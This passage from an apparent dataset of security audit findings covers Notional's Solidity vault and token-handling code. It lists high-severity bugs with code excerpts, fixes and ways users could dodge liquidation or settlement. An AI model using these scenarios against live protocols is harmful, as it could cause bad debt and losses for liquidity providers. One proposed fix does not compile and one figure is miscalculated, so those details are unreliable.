uint256 currentBalance = store[underlying.tokenAddress];\\n if (withdrawAmountExternal <= currentBalance) return;\\n\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n // Redemption data returns an array of contract calls to make from the Notional proxy (which\\n // is holding all of the money market tokens).\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n\\n // This is the total expected underlying that we should redeem after all redemption calls\\n // are executed.\\n uint256 totalUnderlyingRedeemed = executeMoneyMarketRedemptions(underlying, data);\\n\\n // Ensure that we have sufficient funds before we exit\\n require(withdrawAmountExternal <= currentBalance.add(totalUnderlyingRedeemed)); // dev: insufficient redeem\\n }\\n```\\n\\nIf the `currentBalance` is `999,900` USDC and the `withdrawAmountExternal` is `1,000,000` USDC, then there is insufficient balance in the contract, and additional funds need to be withdrawn from the money market (e.g. Compound).\\nSince the contract already has `999,900` USDC, only an additional `100` USDC needs to be withdrawn from the money market to fulfill the withdrawal request of `1,000,000` USDC\\nHowever, instead of withdrawing `100` USDC from the money market, Notional withdraw `1,000,000` USDC from the market as per the `oracle.getRedemptionCalldata(withdrawAmountExternal)` function. 
As a result, an excess of `990,000` USDC is being withdrawn from the money market",Consider withdrawing only the shortfall amount from the money market.\\n```\\n// Remove the line below\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n// Add the line below\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal // Remove the line below\\n currentBalance);\\n```\\n,"This led to an excessive amount of assets idling in Notional and not generating any returns or interest in the money market, which led to a loss of assets for the users as they would receive a lower interest rate than expected and incur opportunity loss.\\nAttackers could potentially abuse this to pull the funds Notional invested in the money market leading to griefing and loss of returns/interest for the protocol.","```\\nFile: TokenHandler.sol\\n function _redeemMoneyMarketIfRequired(\\n uint16 currencyId,\\n Token memory underlying,\\n uint256 withdrawAmountExternal\\n ) private {\\n // If there is sufficient balance of the underlying to withdraw from the contract\\n // immediately, just return.\\n mapping(address => uint256) storage store = LibStorage.getStoredTokenBalances();\\n uint256 currentBalance = store[underlying.tokenAddress];\\n if (withdrawAmountExternal <= currentBalance) return;\\n\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n // Redemption data returns an array of contract calls to make from the Notional proxy (which\\n // is holding all of the money market tokens).\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n\\n // This is the total expected underlying that we should redeem after all redemption calls\\n // are executed.\\n uint256 totalUnderlyingRedeemed = executeMoneyMarketRedemptions(underlying, data);\\n\\n // Ensure that we have sufficient funds before we exit\\n require(withdrawAmountExternal <= 
currentBalance.add(totalUnderlyingRedeemed)); // dev: insufficient redeem\\n }\\n```\\n" +Possible to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstanding,high,"It is possible to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstanding. Thus, leaving accounts with small debt that are not profitable to unwind if it needs to liquidate.\\n```\\nFile: VaultValuation.sol\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. 
An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n ""Must Liquidate All Debt""\\n );\\n```\\n\\n`depositUnderlyingInternal` is always a positive value (Refer to comment on Line 250) that represents the amount of underlying deposited by the liquidator\\n`h.debtOutstanding[currencyIndex]` is always a negative value representing debt outstanding of a specific currency in a vault account\\n`minBorrowSize` is always a positive value that represents the minimal borrow size of a specific currency (It is stored as uint32 in storage)\\nIf liquidating past the debt outstanding above the min borrow, then the entire debt outstanding must be liquidated.\\nAssume the following scenario:\\n`depositUnderlyingInternal` = `70 USDC`\\n`h.debtOutstanding[currencyIndex]` = `-100 USDC`\\n`minBorrowSize` = `50 USDC`\\nIf the liquidation is successful, the vault account should be left with `-30 USDC` debt outstanding because `70 USDC` has been paid off by the liquidator. 
However, this should not happen under normal circumstances because the debt outstanding (-30) does not meet the minimal borrow size of `50 USDC` and the liquidation should revert/fail.\\nThe following piece of validation logic attempts to ensure that all outstanding debt is liquidated if post-liquidation debt does not meet the minimal borrowing size.\\n```\\nrequire(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n ""Must Liquidate All Debt""\\n);\\n```\\n\\nPlugging in the values from our scenario to verify if the code will revert if the debt outstanding does not meet the minimal borrow size.\\n```\\nrequire(\\n (-100 USDC - 70 USDC) < 50 USDC\\n);\\n===>\\nrequire(\\n (-170 USDC) < 50 USDC\\n);\\n===>\\nrequire(true) // no revert\\n```\\n\\nThe above shows that it is possible for someone to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstanding. This shows that the math formula in the code is incorrect and not working as intended.","Update the formula to as follows:\\n```\\nrequire(\\n// Remove the line below\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n// Add the line below\\n h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) > minBorrowSize,\\n ""Must Liquidate All Debt""\\n);\\n```\\n\\nPlugging in the values from our scenario again to verify if the code will revert if the debt outstanding does not meet the minimal borrow size.\\n```\\nrequire(\\n ((-100 USDC).neg() - 70 USDC) > 50 USDC\\n);\\n===>\\nrequire(\\n (100 USDC - 70 USDC) > 50 USDC\\n);\\n===>\\nrequire(\\n (30 USDC) > 50 USDC\\n);\\n===>\\nrequire(false) // revert\\n```\\n\\nThe above will trigger a revert as expected when the debt outstanding does not meet the minimal borrow size.","A liquidation can bring an account below the minimum debt. 
Accounts smaller than the minimum debt are not profitable to unwind if it needs to liquidate (Reference)\\nAs a result, liquidators are not incentivized to liquidate those undercollateralized positions. This might leave the protocol with bad debts, potentially leading to insolvency if the bad debts accumulate.","```\\nFile: VaultValuation.sol\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n ""Must Liquidate All Debt""\\n );\\n```\\n" +Vaults can avoid liquidations by not letting their vault account be settled,high,"Vault liquidations will leave un-matured accounts with cash holdings which are then used to offset account debt during vault account settlements. As it stands, any excess cash received via interest accrual will be transferred back to the vault account directly. If a primary or secondary borrow currency is `ETH`, then this excess cash will be transferred natively. Consequently, the recipient may intentionally revert, causing account settlement to fail.\\nThe issue arises in the `VaultAccount.repayAccountPrimeDebtAtSettlement()` function. 
If there is any excess cash due to interest accrual, then this amount will be refunded to the vault account. Native `ETH` is not wrapped when it should be wrapped, allowing the recipient to take control over the flow of execution.\\n```\\nFile: VaultAccount.sol\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. 
The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n\\n // Updates the global prime debt figure and events are emitted via the vault.\\n pr.updateTotalPrimeDebt(vault, currencyId, netPrimeDebtChange);\\n\\n // Updates the state on the prime vault storage directly.\\n int256 totalPrimeDebt = int256(uint256(primeVaultState.totalDebt));\\n int256 newTotalDebt = totalPrimeDebt.add(netPrimeDebtChange);\\n // Set the total debt to the storage value\\n primeVaultState.totalDebt = newTotalDebt.toUint().toUint80();\\n }\\n }\\n```\\n\\nAs seen here, a `withdrawWrappedNativeToken` is used to signify when a native `ETH` transfer will be wrapped before sending an amount. 
In the case of vault settlement, this is always sent to `false`.\\n```\\nFile: TokenHandler.sol\\n function withdrawPrimeCash(\\n address account,\\n uint16 currencyId,\\n int256 primeCashToWithdraw,\\n PrimeRate memory primeRate,\\n bool withdrawWrappedNativeToken\\n ) internal returns (int256 netTransferExternal) {\\n if (primeCashToWithdraw == 0) return 0;\\n require(primeCashToWithdraw < 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n netTransferExternal = convertToExternal(\\n underlying, \\n primeRate.convertToUnderlying(primeCashToWithdraw) \\n );\\n\\n // Overflow not possible due to int256\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n _redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n\\n if (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n } else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n }\\n\\n _postTransferPrimeCashUpdate(account, currencyId, netTransferExternal, underlying, primeRate);\\n }\\n```\\n\\nIt's likely that the vault account is considered solvent in this case, but due to the inability to trade between currencies, it is not possible to use excess cash in one currency to offset debt in another.",Consider wrapping `ETH` under all circumstances. 
This will prevent vault accounts from intentionally reverting and preventing their account from being settled.,"Liquidations require vaults to be settled if `block.timestamp` is past the maturity date, hence, it is not possible to deleverage vault accounts, leading to bad debt accrual.","```\\nFile: VaultAccount.sol\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. 
The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n\\n // Updates the global prime debt figure and events are emitted via the vault.\\n pr.updateTotalPrimeDebt(vault, currencyId, netPrimeDebtChange);\\n\\n // Updates the state on the prime vault storage directly.\\n int256 totalPrimeDebt = int256(uint256(primeVaultState.totalDebt));\\n int256 newTotalDebt = totalPrimeDebt.add(netPrimeDebtChange);\\n // Set the total debt to the storage value\\n primeVaultState.totalDebt = newTotalDebt.toUint().toUint80();\\n }\\n }\\n```\\n" +Possible to create vault positions ineligible for liquidation,high,"Users can self-liquidate their secondary debt holdings in such a way that it is no longer possible to deleverage their vault account as `checkMinBorrow` will fail post-maturity.\\nWhen deleveraging a vault account, the liquidator will pay down account debt directly and the account will not accrue any cash. Under most circumstances, it is not possible to put an account's debt below its minimum borrow size.\\nHowever, there are two exceptions to this:\\nLiquidators purchasing cash from a vault account. 
This only applies to non-prime vault accounts.\\nA vault account is being settled and `checkMinBorrow` is skipped to ensure an account can always be settled.\\n```\\nFile: VaultLiquidationAction.sol\\n function deleverageAccount(\\n address account,\\n address vault,\\n address liquidator,\\n uint16 currencyIndex,\\n int256 depositUnderlyingInternal\\n ) external payable nonReentrant override returns (\\n uint256 vaultSharesToLiquidator,\\n int256 depositAmountPrimeCash\\n ) {\\n require(currencyIndex < 3);\\n (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) = _authenticateDeleverage(account, vault, liquidator);\\n\\n PrimeRate memory pr;\\n // Currency Index is validated in this method\\n (\\n depositUnderlyingInternal,\\n vaultSharesToLiquidator,\\n pr\\n ) = IVaultAccountHealth(address(this)).calculateDepositAmountInDeleverage(\\n currencyIndex, vaultAccount, vaultConfig, vaultState, depositUnderlyingInternal\\n );\\n\\n uint16 currencyId = vaultConfig.borrowCurrencyId;\\n if (currencyIndex == 1) currencyId = vaultConfig.secondaryBorrowCurrencies[0];\\n else if (currencyIndex == 2) currencyId = vaultConfig.secondaryBorrowCurrencies[1];\\n\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // Excess ETH is returned to the liquidator natively\\n (/* */, depositAmountPrimeCash) = TokenHandler.depositUnderlyingExternal(\\n liquidator, currencyId, token.convertToExternal(depositUnderlyingInternal), pr, false \\n );\\n\\n // Do not skip the min borrow check here\\n vaultAccount.vaultShares = vaultAccount.vaultShares.sub(vaultSharesToLiquidator);\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Vault account will not incur a cash balance if they are in the prime cash maturity, their debts\\n // will be paid down directly.\\n _reduceAccountDebt(\\n vaultConfig, vaultState, vaultAccount, pr, currencyIndex, depositUnderlyingInternal, true\\n );\\n 
depositAmountPrimeCash = 0;\\n }\\n\\n // Check min borrow in this liquidation method, the deleverage calculation should adhere to the min borrow\\n vaultAccount.setVaultAccountForLiquidation(vaultConfig, currencyIndex, depositAmountPrimeCash, true);\\n\\n emit VaultDeleverageAccount(vault, account, currencyId, vaultSharesToLiquidator, depositAmountPrimeCash);\\n emit VaultLiquidatorProfit(vault, account, liquidator, vaultSharesToLiquidator, true);\\n\\n _transferVaultSharesToLiquidator(\\n liquidator, vaultConfig, vaultSharesToLiquidator, vaultAccount.maturity\\n );\\n\\n Emitter.emitVaultDeleverage(\\n liquidator, account, vault, currencyId, vaultState.maturity,\\n depositAmountPrimeCash, vaultSharesToLiquidator\\n );\\n }\\n```\\n\\n`currencyIndex` represents which currency is being liquidated and `depositUnderlyingInternal` the amount of debt being reduced. Only one currency's debt can be updated here.\\n```\\nFile: VaultLiquidationAction.sol\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n pr[currencyIndex - 1] = primeRate;\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 ? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? 
depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\n\\nIn the case of vault settlement, through self-liquidation, users can setup their debt and cash holdings post-settlement, such that both `accountDebtOne` and `accountDebtTwo` are non-zero and less than `vaultConfig.minAccountSecondaryBorrow`. The objective would be to have zero primary debt and `Y` secondary debt and `X` secondary cash. Post-settlement, cash is used to offset debt (Y - `X` < minAccountSecondaryBorrow) and due to the lack of `checkMinBorrow` in `VaultAccountAction.settleVaultAccount()`, both secondary currencies can have debt holdings below the minimum amount.\\nNow when `deleverageAccount()` is called on a prime vault account, debts are paid down directly. However, if we are only able to pay down one secondary currency at a time, `checkMinBorrow` will fail in `VaultSecondaryBorrow.updateAccountSecondaryDebt()` because both debts are checked.\\n```\\nFile: VaultSecondaryBorrow.sol\\n if (checkMinBorrow) {\\n // No overflow on negation due to overflow checks above\\n require(accountDebtOne == 0 || vaultConfig.minAccountSecondaryBorrow[0] <= -accountDebtOne, ""min borrow"");\\n require(accountDebtTwo == 0 || vaultConfig.minAccountSecondaryBorrow[1] <= -accountDebtTwo, ""min borrow"");\\n }\\n```\\n\\nNo prime fees accrue on secondary debt, hence, this debt will never reach a point where it is above the minimum borrow amount.",Either allow for multiple currencies to be liquidated or ensure that `checkMinBorrow` is performed only on the currency which is being liquidated.,"Malicious actors can generate vault accounts which cannot be liquidated. 
Through opening numerous vault positions, Notional can rack up significant exposure and accrue bad debt as a result.","```\\nFile: VaultLiquidationAction.sol\\n function deleverageAccount(\\n address account,\\n address vault,\\n address liquidator,\\n uint16 currencyIndex,\\n int256 depositUnderlyingInternal\\n ) external payable nonReentrant override returns (\\n uint256 vaultSharesToLiquidator,\\n int256 depositAmountPrimeCash\\n ) {\\n require(currencyIndex < 3);\\n (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) = _authenticateDeleverage(account, vault, liquidator);\\n\\n PrimeRate memory pr;\\n // Currency Index is validated in this method\\n (\\n depositUnderlyingInternal,\\n vaultSharesToLiquidator,\\n pr\\n ) = IVaultAccountHealth(address(this)).calculateDepositAmountInDeleverage(\\n currencyIndex, vaultAccount, vaultConfig, vaultState, depositUnderlyingInternal\\n );\\n\\n uint16 currencyId = vaultConfig.borrowCurrencyId;\\n if (currencyIndex == 1) currencyId = vaultConfig.secondaryBorrowCurrencies[0];\\n else if (currencyIndex == 2) currencyId = vaultConfig.secondaryBorrowCurrencies[1];\\n\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // Excess ETH is returned to the liquidator natively\\n (/* */, depositAmountPrimeCash) = TokenHandler.depositUnderlyingExternal(\\n liquidator, currencyId, token.convertToExternal(depositUnderlyingInternal), pr, false \\n );\\n\\n // Do not skip the min borrow check here\\n vaultAccount.vaultShares = vaultAccount.vaultShares.sub(vaultSharesToLiquidator);\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Vault account will not incur a cash balance if they are in the prime cash maturity, their debts\\n // will be paid down directly.\\n _reduceAccountDebt(\\n vaultConfig, vaultState, vaultAccount, pr, currencyIndex, depositUnderlyingInternal, true\\n );\\n depositAmountPrimeCash = 0;\\n }\\n\\n // Check min 
borrow in this liquidation method, the deleverage calculation should adhere to the min borrow\\n vaultAccount.setVaultAccountForLiquidation(vaultConfig, currencyIndex, depositAmountPrimeCash, true);\\n\\n emit VaultDeleverageAccount(vault, account, currencyId, vaultSharesToLiquidator, depositAmountPrimeCash);\\n emit VaultLiquidatorProfit(vault, account, liquidator, vaultSharesToLiquidator, true);\\n\\n _transferVaultSharesToLiquidator(\\n liquidator, vaultConfig, vaultSharesToLiquidator, vaultAccount.maturity\\n );\\n\\n Emitter.emitVaultDeleverage(\\n liquidator, account, vault, currencyId, vaultState.maturity,\\n depositAmountPrimeCash, vaultSharesToLiquidator\\n );\\n }\\n```\\n" +Partial liquidations are not possible,high,"Due to an incorrect implementation of `VaultValuation.getLiquidationFactors()`, Notional requires that a liquidator reduces an account's debt below `minBorrowSize`. This does not allow liquidators to partially liquidate a vault account into a healthy position and opens up the protocol to an edge case where an account is always ineligible for liquidation.\\nWhile `VaultValuation.getLiquidationFactors()` might allow for the resultant outstanding debt to be below the minimum borrow amount and non-zero, `deleverageAccount()` will revert due to `checkMinBorrow` being set to `true`. 
Therefore, the only option is for liquidators to wipe the outstanding debt entirely but users can set up their vault accounts such that that `maxLiquidatorDepositLocal` is less than each of the vault currency's outstanding debt.\\n```\\nFile: VaultValuation.sol\\n int256 maxLiquidatorDepositLocal = _calculateDeleverageAmount(\\n vaultConfig,\\n h.vaultShareValueUnderlying,\\n h.totalDebtOutstandingInPrimary.neg(),\\n h.debtOutstanding[currencyIndex].neg(),\\n minBorrowSize,\\n exchangeRate,\\n er.rateDecimals\\n );\\n\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n ""Must Liquidate All Debt""\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\n\\nIf `depositUnderlyingInternal >= maxLiquidatorDepositLocal`, then the liquidator's deposit is capped to `maxLiquidatorDepositLocal`. 
However, `maxLiquidatorDepositLocal` may put the vault account's outstanding debt below the minimum borrow amount but not to zero.\\nHowever, because it is not possible to partially liquidate the account's debt, we reach a deadlock where it isn't possible to liquidate all outstanding debt and it also isn't possible to liquidate debt partially. So even though it may be possible to liquidate an account into a healthy position, the current implementation doesn't always allow for this to be true.","`VaultValuation.getLiquidationFactors()` must be updated to allow for partial liquidations.\\n```\\nFile: VaultValuation.sol\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) >= minBorrowSize,\\n || h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) == 0\\n ""Must Liquidate All Debt""\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\n",Certain vault positions will never be eligible for liquidation and hence Notional may be left with bad debt. 
Liquidity providers will lose funds as they must cover the shortfall for undercollateralised positions.,"```\\nFile: VaultValuation.sol\\n int256 maxLiquidatorDepositLocal = _calculateDeleverageAmount(\\n vaultConfig,\\n h.vaultShareValueUnderlying,\\n h.totalDebtOutstandingInPrimary.neg(),\\n h.debtOutstanding[currencyIndex].neg(),\\n minBorrowSize,\\n exchangeRate,\\n er.rateDecimals\\n );\\n\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n ""Must Liquidate All Debt""\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\n" +Vault accounts with excess cash can avoid being settled,high,"If excess cash was transferred out from an account during account settlement, then the protocol will check the account's collateral ratio and revert if the position is unhealthy. 
Because it may not be possible to settle a vault account, liquidators cannot reduce account debt by purchasing vault shares because `_authenticateDeleverage()` will check to see if a vault has matured.\\nConsidering an account's health is determined by a combination of its outstanding debt, cash holdings and the total underlying value of its vault shares, transferring out excess cash may actually put an account in an unhealthy position.\\n```\\nFile: VaultAccountAction.sol\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, ""No Settle"");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. 
If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n\\nIt is important to note that all vault liquidation actions require a vault to first be settled. Hence, through self-liquidation, sophisticated vault accounts can have excess cash in one currency and significant debt holdings in the vault's other currencies.\\n```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. 
settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, ""Must Settle"");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\n\\nConsider the following example:\\nAlice has a valid borrow position in the vault which is considered risky. She has a small bit of secondary cash but most of her debt is primary currency denominated. Generally speaking her vault is healthy. Upon settlement, the small bit of excess secondary cash is transferred out and her vault is undercollateralised and eligible for liquidation. However, we are deadlocked because it is not possible to settle the vault because `checkVaultAccountCollateralRatio()` will fail, and it's not possible to purchase the excess cash and offset the debt directly via `liquidateVaultCashBalance()` or `deleverageAccount()` because `_authenticateDeleverage()` will revert if a vault has not yet been settled.","Consider adding a liquidation method which settles a vault account and allows for a liquidator to purchase vault shares, offsetting outstanding debt, before performing collateral ratio checks.",Vault accounts can create positions which will never be eligible for liquidation and the protocol may accrue bad debt.,"```\\nFile: VaultAccountAction.sol\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory 